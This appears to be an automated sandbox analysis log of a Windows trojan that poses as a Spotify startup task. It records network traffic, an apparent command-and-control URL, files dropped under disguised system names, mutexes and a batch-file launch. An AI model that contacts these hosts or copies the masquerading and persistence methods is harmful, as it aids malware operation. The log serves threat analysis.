                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 38 20 4a 61 6e 20 32 30 32 35 20 31 38 3a 32 33 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 31 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-alive<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:24:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:24:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: PlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002D.00000002.1856049726.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003743000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://505905cm.n9shka.top
                            Source: PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://505905cm.n9shka.top/
                            Source: PlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://505905cm.n9shka.top/imagePollLinuxCentral.php
                            Source: powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000016.00000002.1875963931.00000207DAA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D04C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: PlZA6b48MW.exe, 00000000.00000002.1749070482.000000000309B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1875963931.00000207DA861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80001000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000016.00000002.1875963931.00000207DAA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D04C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000016.00000002.1875963931.00000207DA861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 0000001B.00000002.3256027350.000001A190077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Windows\DiagTrack\Scenarios\5915f7c410c8ebJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMPJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9B880D4C0_2_00007FFD9B880D4C
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9B880E430_2_00007FFD9B880E43
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9BC7B6C80_2_00007FFD9BC7B6C8
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 45_2_00007FFD9B890D4C45_2_00007FFD9B890D4C
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 45_2_00007FFD9B890E4345_2_00007FFD9B890E43
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B8BA24847_2_00007FFD9B8BA248
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B8BDE2547_2_00007FFD9B8BDE25
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B880D4C47_2_00007FFD9B880D4C
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B880E4347_2_00007FFD9B880E43
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeCode function: 56_2_00007FFD9B8A0D4C56_2_00007FFD9B8A0D4C
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeCode function: 56_2_00007FFD9B8A0E4356_2_00007FFD9B8A0E43
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeCode function: 56_2_00007FFD9BC9C54356_2_00007FFD9BC9C543
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B8BA24859_2_00007FFD9B8BA248
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B8BDE2559_2_00007FFD9B8BDE25
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B880D4C59_2_00007FFD9B880D4C
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B880E4359_2_00007FFD9B880E43
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CwRRQJIe.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                            Source: PlZA6b48MW.exe, 00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000000.00000002.1818541389.000000001B6B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000026.00000002.2728643910.0000000002F63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000026.00000002.2728643910.0000000002FAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000026.00000002.2728643910.0000000003019000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000026.00000002.2728643910.0000000002F53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000027.00000002.2694248504.0000000002F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe.0.drBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: PlZA6b48MW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: dllhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: WtHZilDMhVnOIkoIfPBLn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: PlZA6b48MW.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: WtHZilDMhVnOIkoIfPBLn.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: PlZA6b48MW.exe, CLZOU1nWue0Qdk97iqU.csCryptographic APIs: 'CreateDecryptor'
                            Source: PlZA6b48MW.exe, CLZOU1nWue0Qdk97iqU.csCryptographic APIs: 'CreateDecryptor'
                            Source: PlZA6b48MW.exe, CLZOU1nWue0Qdk97iqU.csCryptographic APIs: 'CreateDecryptor'
                            Source: PlZA6b48MW.exe, CLZOU1nWue0Qdk97iqU.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@69/82@1/1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Program Files\Windows Multimedia Platform\dllhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\IXnYeTUQ.logJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8876:120:WilError_03
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8420:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8600:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-e0MEoQzZAqT5aSFnG7OI
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\AppData\Local\Temp\py4wf331Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat"
                            Source: PlZA6b48MW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: PlZA6b48MW.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
